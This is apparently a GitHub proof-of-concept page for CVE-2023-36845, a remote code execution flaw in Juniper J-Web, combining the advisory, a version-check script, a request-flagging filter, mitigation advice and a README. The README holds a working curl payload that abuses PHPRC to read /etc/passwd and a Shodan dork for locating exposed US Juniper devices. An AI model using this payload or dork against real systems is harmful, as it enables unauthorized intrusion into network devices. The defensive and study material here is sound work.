CVE-2023-36845 PoC — Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment

Source
Associated Vulnerability
Title: Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable (CVE-2023-36845)

Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection and execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series:

* All versions prior to 20.4R3-S9;
* 21.1 versions 21.1R1 and later;
* 21.2 versions prior to 21.2R3-S7;
* 21.3 versions prior to 21.3R3-S5;
* 21.4 versions prior to 21.4R3-S5;
* 22.1 versions prior to 22.1R3-S4;
* 22.2 versions prior to 22.2R3-S2;
* 22.3 versions prior to 22.3R2-S2, 22.3R3-S1;
* 22.4 versions prior to 22.4R2-S1, 22.4R3;
* 23.2 versions prior to 23.2R1-S1, 23.2R2.
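The affected ranges above expressed as a version check, as an added example (not Juniper's or the PoC author's code). It assumes a build counts as fixed when it has the same R number as a listed fix with an equal or higher S number, or a later R number than any listed fix; `FIXED` and `is_listed_affected` are names chosen here.

```python
import re

# Fixed releases per train as (R, S) pairs, transcribed from the advisory text
# above. An empty list means the text names no fixed release for that train.
FIXED = {
    (20, 4): [(3, 9)],
    (21, 1): [],
    (21, 2): [(3, 7)],
    (21, 3): [(3, 5)],
    (21, 4): [(3, 5)],
    (22, 1): [(3, 4)],
    (22, 2): [(3, 2)],
    (22, 3): [(2, 2), (3, 1)],
    (22, 4): [(2, 1), (3, 0)],
    (23, 2): [(1, 1), (2, 0)],
}
OLDEST_LISTED = min(FIXED)


def is_listed_affected(version: str) -> bool:
    """True if `version` falls inside the affected ranges listed above."""
    v = version.strip()
    m = re.match(r"(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"not a Junos version: {version!r}")
    train = (int(m.group(1)), int(m.group(2)))
    if train < OLDEST_LISTED:
        return True           # "All versions prior to 20.4R3-S9"
    if train not in FIXED:
        return False          # train is not named in the advisory text
    # Accepts forms such as 21.4R3, 21.4R3.8, 21.4R3-S5 and 21.4R3-S5.4.
    rs = re.match(r"\d+\.\d+R(\d+)(?:\.\d+)?(?:-S(\d+))?", v)
    if not rs:
        raise ValueError(f"unsupported release format: {version!r}")
    r, s = int(rs.group(1)), int(rs.group(2) or 0)
    fixes = FIXED[train]
    if not fixes:
        return True           # e.g. 21.1: "21.1R1 and later"
    if r > max(fr for fr, _ in fixes):
        return False          # later R release than any listed fix (assumption)
    return not any(r == fr and s >= fs for fr, fs in fixes)
```
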
Description
Juniper Networks POC Understanding CVE-2023-36845 Remote Code Execution Exploit and Protection
Readme
> [!NOTE]
> Useful information that users should know, even when skimming content. This content is for learning, not to be abused or taken down the wrong track. I wrote this article solely to learn about cybersecurity research, namely becoming a Penetration Tester, in dealing with the CVE-2023-36845 vulnerability.

The following is a write-up or explanation of the CVE-2023-36845 vulnerability and how to protect yourself from this vulnerability. 
**Juniper Networks POC Understanding CVE-2023-36845 Remote Code Execution Exploit and Protection**





### Vulnerability Description:
A PHP External Variable Modification vulnerability was discovered in Juniper Networks Junos OS, specifically impacting the EX Series and SRX Series. This vulnerability permits an unauthenticated attacker to remotely execute malicious code. By exploiting this vulnerability through a carefully crafted request, attackers can manipulate the PHP execution environment, facilitating the injection and execution of code.

### Exploiting CVE-2023-36845
Exploiting this vulnerability is as simple as making a crafted request with the PHPRC variable set. The attacker can remotely execute code, thereby compromising the system. A sample Proof of Concept (PoC) command is as follows:
```bash
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
```
### How to Protect Your Systems
Protecting your systems from CVE-2023-36845 is of utmost importance. Here are some key steps to safeguard your Juniper Networks Junos OS installations:
 1. **Patch Your System:** Ensure that your Junos OS is updated to a non-vulnerable version. Juniper Networks regularly releases patches and updates to address security concerns.
 1. **Access Control:** Limit access to your Junos OS devices to trusted IP addresses or network segments. This reduces the risk of unauthorized access.
 1. **Firewall Rules:** Implement firewall rules to restrict inbound and outbound traffic to and from your devices.
 1. **Web Application Firewall (WAF):** Deploy a WAF to filter and monitor incoming web traffic, which can help detect and block malicious requests.
 1. **Security Scanning:** Use security scanning tools like Burp Suite to proactively test your systems for vulnerabilities.
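
One way to implement the request check a WAF or reverse proxy in front of J-Web would perform, as an added example that is not part of the original README. It collects parameter names from the query string and from urlencoded or multipart bodies and flags the two names used by the request shown earlier; the function names, the sample body and its boundary are constructed for illustration.

```python
from email import message_from_bytes
from urllib.parse import parse_qsl, urlsplit

# Names taken from the PoC on this page: the PHPRC environment variable and
# the auto_prepend_file ini directive. Matching is case-insensitive.
WATCHED = {"phprc", "auto_prepend_file"}


def param_names(target: str, content_type: str = "", body: bytes = b"") -> set:
    """Collect parameter names from the query string and the request body."""
    names = {k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)}
    ctype = content_type.lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        names |= {k for k, _ in parse_qsl(body.decode("latin-1"), keep_blank_values=True)}
    elif ctype.startswith("multipart/form-data"):
        # Reuse the MIME parser: prepend the Content-Type header to the body.
        raw = b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body
        msg = message_from_bytes(raw)
        if msg.is_multipart():
            for part in msg.get_payload():
                name = part.get_param("name", header="content-disposition")
                if isinstance(name, str):
                    names.add(name)
    return names


def flag_request(target: str, content_type: str = "", body: bytes = b"") -> list:
    """Return the watched names present in the request (sorted); empty if clean."""
    found = param_names(target, content_type, body)
    return sorted(n for n in found if n.lower() in WATCHED)


# Constructed sample: a multipart body with the same two field names as the
# PoC request, with the field values replaced by placeholders.
BOUNDARY = "----constructed"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="auto_prepend_file"\r\n\r\n'
    "(value omitted)\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="PHPRC"\r\n\r\n'
    "(value omitted)\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
```

Because the names can arrive in a request body, this check has to run where the body is visible (WAF or reverse proxy), not only over access logs that record the URL.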

### Shodan Dork for CVE-2023-36845
To identify systems susceptible to CVE-2023-36845 using Shodan, you can utilize the following dork:
```text
title:"Juniper" http.favicon.hash:2141724739 country:"US"
```
This dork narrows down the search to Juniper devices with the specified favicon hash in the United States.


### In Conclusion
CVE-2023-36845 is a significant threat to Juniper Networks Junos OS users. Understanding the vulnerability, actively patching your systems, and implementing security measures can help protect your network infrastructure. Staying vigilant is key to mitigating the risks associated with such vulnerabilities in the ever-evolving landscape of cybersecurity.






File Snapshot

[4.0K] /data/pocs/0706d07541dde31522d85c7d1d452d18a7b06c2e
├── [1.0K] LICENSE
├── [3.0K] README.md
└── [1.4K] run.py

0 directories, 3 files